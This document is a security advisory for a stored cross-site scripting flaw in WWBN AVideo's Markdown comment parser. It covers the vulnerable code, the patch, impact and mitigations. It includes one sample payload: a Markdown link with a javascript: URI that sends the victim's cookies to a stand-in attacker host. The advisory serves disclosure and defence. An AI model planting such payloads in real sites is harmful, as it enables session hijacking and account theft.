CVE-2026-33500: Stored Cross-Site Scripting via Markdown Parsing Bypass in WWBN AVideo

WWBN AVideo, formerly known as YouPHPTube, is an open-source video platform that allows users to upload, share, and comment on video content. The application supports Markdown formatting within user comments, processed by the PHP Parsedown library. A vulnerability exists in how the platform customizes this Markdown parsing implementation.

The vulnerability is classified as Stored Cross-Site Scripting (CWE-79). It specifically affects the markDownToHTML() function located in objects/functionsSecurity.php. This function processes user-supplied text before rendering it as HTML in the browser. The core issue involves a security bypass where Markdown-native link syntax is not properly sanitized against malicious URI schemes.

This flaw represents an incomplete remediation of a prior vulnerability, identified as CVE-2026-27568. In attempting to allow specific safe HTML tags while stripping dangerous ones, developers disabled the upstream library's core security mechanisms. This architectural choice left native Markdown syntax handlers exposed to injection attacks.

An authenticated attacker can exploit this vulnerability by submitting a comment containing a crafted Markdown link. When a victim views the affected comment, the application renders an HTML anchor tag with a javascript: URI, resulting in arbitrary JavaScript execution within the context of the victim's session.

The root cause of CVE-2026-33500 is the explicit disabling of the Parsedown library's safeMode combined with incomplete override implementations in a custom subclass. The developers introduced a custom class named ParsedownSafeWithLinks to handle specific HTML tag sanitization.

During the processing of text in objects/functionsSecurity.php, the application instantiates the custom parser and explicitly calls $parsedown->setSafeMode(false). By disabling safeMode, the application opts out of Parsedown's native security features, specifically the filterUnsafeUrlInAttribute() method. This upstream method is responsible for blocking dangerous URI schemes like javascript: and vbscript:.

The custom ParsedownSafeWithLinks class successfully sanitizes raw HTML tags (e.g., <a href="...">) by overriding the inlineMarkup() method and passing the content through a custom sanitizeATag() function. However, the developers failed to override the inlineLink() method, which handles the native Markdown link syntax [text](url).

When a user submits Markdown link syntax, the text bypasses the inlineMarkup() sanitization entirely. It routes through the default inlineLink() method. Because safeMode is disabled, the resulting URL is not checked for dangerous schemes, allowing the application to output unsanitized user input directly into the href attribute of an anchor tag.

An examination of the vulnerable code in objects/functionsSecurity.php demonstrates the misconfiguration of the Markdown parser. The function markDownToHTML instantiates the custom parser and configures its state before processing user input.

function markDownToHTML($text) {
    $parsedown = new ParsedownSafeWithLinks();
    $parsedown->setSafeMode(false);   // Vulnerable configuration
    $parsedown->setMarkupEscaped(false);
    $html = $parsedown->text($text);
    return $html;
}

The configuration $parsedown->setSafeMode(false) removes the built-in URI filtering. Without an override for the inlineLink() method in ParsedownSafeWithLinks, any javascript: URI passed via standard Markdown syntax remains intact in the final HTML output.

The official patch addresses this by adding an overridden inlineLink() method to the ParsedownSafeWithLinks class. This override intercepts the parsed link object and applies a strict regular expression whitelist to the href attribute.

protected function inlineLink($Excerpt)
{
    $Link = parent::inlineLink($Excerpt);
    if ($Link === null) {
        return null;
    }
    $href = isset($Link['element']['attributes']['href']) ? $Link['element']['attributes']['href'] : '';
    
    // Whitelist: http(s), mailto, relative paths, page anchors.
    if ($href !== '' && !preg_match('/^(https?:\/\/|mailto:|\/|#)/i', $href)) {
        $Link['element']['attributes']['href'] = ''; // Neutralize dangerous URI
    }
    return $Link;
}

This patch ensures that even with safeMode disabled globally, the specific code path responsible for handling Markdown links enforces a strict allowlist. It nullifies the href attribute if the scheme is not explicitly permitted.

Exploitation of CVE-2026-33500 requires the attacker to possess an active session on the target AVideo instance with permissions to submit comments. The attacker must target a video or page where comments are publicly visible or visible to administrative users.

The attacker crafts a comment containing a standard Markdown link structure. Instead of supplying a valid HTTP URL, the attacker provides a javascript: URI payload. The payload structure is [Clickable Text](javascript:malicious_code_here).

[See related video](javascript:fetch('https://attacker.example/log?c='+document.cookie))

The application stores this comment in the database without sanitizing the URI. When a victim navigates to the video page, the application retrieves the comment, processes it through markDownToHTML(), and renders the HTML to the victim's browser.

The attack concludes when the victim interacts with the rendered link. The browser executes the JavaScript payload within the security context of the AVideo application. The execution relies on user interaction (UI:R), as the victim must click the injected link.

The concrete security impact of CVE-2026-33500 is the ability for an attacker to execute arbitrary JavaScript in the context of other users' sessions. This classification corresponds to a CVSS 3.1 base score of 5.4 (Medium), with the vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N.

Successful exploitation allows the attacker to access sensitive session identifiers, such as cookies or local storage tokens, provided they are not protected by the HttpOnly flag. The attacker can exfiltrate these tokens to a controlled server, facilitating complete session hijacking and account takeover.

Beyond session hijacking, the attacker can force the victim's browser to perform unauthorized actions on the platform. If the victim is an administrative user, the payload can trigger administrative endpoints to alter site configurations, elevate privileges of attacker-controlled accounts, or modify system content.

The impact is constrained by the requirement for user interaction. The payload does not execute automatically upon page load; it strictly requires the victim to click the malicious hyperlink. Additionally, the attacker must hold a valid, authenticated session to inject the payload initially.

The vendor has addressed this vulnerability in WWBN AVideo versions greater than 26.0. System administrators must update their instances to the latest available release. The fix is explicitly tracked in commit 3ae02fa240939dbefc5949d64f05790fd25d728d.

Organizations unable to apply the patch immediately should restrict commenting privileges to trusted users. Disabling comments entirely serves as a temporary workaround that completely mitigates the attack vector. Administrators should monitor the database for existing malicious payloads by searching the comments table for the string javascript:.

Developers maintaining custom forks of AVideo must ensure that the ParsedownSafeWithLinks class is correctly updated with the new inlineLink() override. Furthermore, security teams should implement a Web Application Firewall (WAF) rule to block incoming POST requests to comment submission endpoints if the payload body matches regex patterns indicative of Markdown javascript: URIs.